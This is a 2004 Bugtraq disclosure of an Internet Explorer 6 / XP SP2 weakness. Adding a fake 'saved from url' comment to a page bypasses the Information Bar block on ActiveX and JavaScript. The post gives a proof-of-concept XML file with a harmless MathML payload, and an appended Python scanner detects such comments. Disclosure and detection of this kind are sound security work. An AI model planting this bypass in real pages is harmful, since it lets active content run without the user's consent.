Bugtraq mailing list archives
IE6 + XP SP2 Vulnerability
From: cns <cns () free fr>
Date: Thu, 16 Sep 2004 01:01:58 +0200
Background information
======================

Windows XP Service Pack 2 has introduced new features that improve browsing security in Internet Explorer. Most of them are additional messages that force the user to validate everything that is done by the browser. Most of these messages are displayed in the new Information Bar.

For example if you try to open a web page that contains Javascript code or ActiveX objects, it is likely that they will be blocked, the Information Bar will appear and offer you to reload the page with the untrustworthy components enabled.

More information can be found at:
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2brows.mspx

The side effect of these features is that some web sites can't be used as easily as before because the user has to respond to an increasing number of notifications and questions.

Vulnerability Explained
=======================

As an example I created a simple XHTML document containing MathML and installed the MathPlayer ActiveX plugin from DesignScience (http://www.dessci.com/en).

This type of document used to render correctly in IE6 but since SP2 was installed the new features interfere with the loading of the component: the page is first loaded without MathPlayer which has to be enabled via the Information Bar.

But there seems to be a vulnerability in Internet Explorer that allows this protection to be bypassed. All that needs to be done is to add a fake comment between the DOCTYPE declaration and the <html> tag that mimics those added by IE when a page is saved to disk.

The "fake" comments must be formatted as follows:

<!-- saved from url=(XXXX)URL -->

where URL is to be replaced by a URL (for instance http://www.example.com/) and XXXX by a 4-digit integer that represents the number of characters in the URL (for instance 0023).

System Affected
===============

Windows XP Pro and Home editions with SP2
IE 6.0 (SP2)

How to reproduce
================

Install the plugin from DesignScience.

Paste the following text in a file with an .xml extension. Open it with IE with and without the comment on line 4.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus MathML 2.0//EN"
"http://www.w3.org/TR/MathML2/dtd/xhtml-math11-f.dtd">
<!-- saved from url=(0023)http://www.example.com/ -->
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>IE Vulnerability example</TITLE>
<BODY>
<math displaystyle="true" xmlns="&mathml;">
<mfrac>
<mn>27</mn>
<mn>12</mn>
</mfrac>
</math>
</BODY></HTML>

Remarks
=======

This also works with pages containing Javascript code.

-- 
Cyrille SZYMANSKI
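For reviewing documents that arrive from a remote source, a scanner can flag files that already carry the "saved from url" comment described in the post and check its length field. This is an added example, not part of the original post; the function name, the list of tags treated as active content and the 2048-character window are assumptions, and the sample documents are constructed.

```python
import re

# Comment format as described in the post: <!-- saved from url=(XXXX)URL -->
SAVED_FROM = re.compile(r"<!--\s*saved from url=\((\d{4})\)(\S*?)\s*-->", re.I)
# Tags treated here as active content (assumption: script, object and MathML,
# the component types the post mentions).
ACTIVE = re.compile(r"<\s*(script|object|math)\b", re.I)

def inspect_document(markup, head_chars=2048):
    """Report 'saved from url' comments near the top of a document.

    Returns one dict per comment with the declared URL, whether the 4-digit
    length field matches the URL, and which active-content tags the document
    contains.
    """
    active = sorted({m.group(1).lower() for m in ACTIVE.finditer(markup)})
    findings = []
    for m in SAVED_FROM.finditer(markup[:head_chars]):
        declared, url = int(m.group(1)), m.group(2)
        findings.append({
            "url": url,
            "declared_len": declared,
            "length_ok": declared == len(url),
            "active_content": active,
        })
    return findings

# Constructed sample inputs (the first follows the layout of the post's file).
WITH_COMMENT = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus MathML 2.0//EN"
"http://www.w3.org/TR/MathML2/dtd/xhtml-math11-f.dtd">
<!-- saved from url=(0023)http://www.example.com/ -->
<html xmlns="http://www.w3.org/1999/xhtml"><body>
<math xmlns="&mathml;"><mn>27</mn></math></body></html>"""
WITHOUT_COMMENT = WITH_COMMENT.replace(
    "<!-- saved from url=(0023)http://www.example.com/ -->\n", "")
BAD_LENGTH = WITH_COMMENT.replace("(0023)", "(0099)")

if __name__ == "__main__":
    for name, doc in [("with", WITH_COMMENT), ("without", WITHOUT_COMMENT),
                      ("bad length", BAD_LENGTH)]:
        print(name, inspect_document(doc))
```

A document that was not saved locally by the user yet already carries the comment, especially alongside active content, is the case worth a closer look.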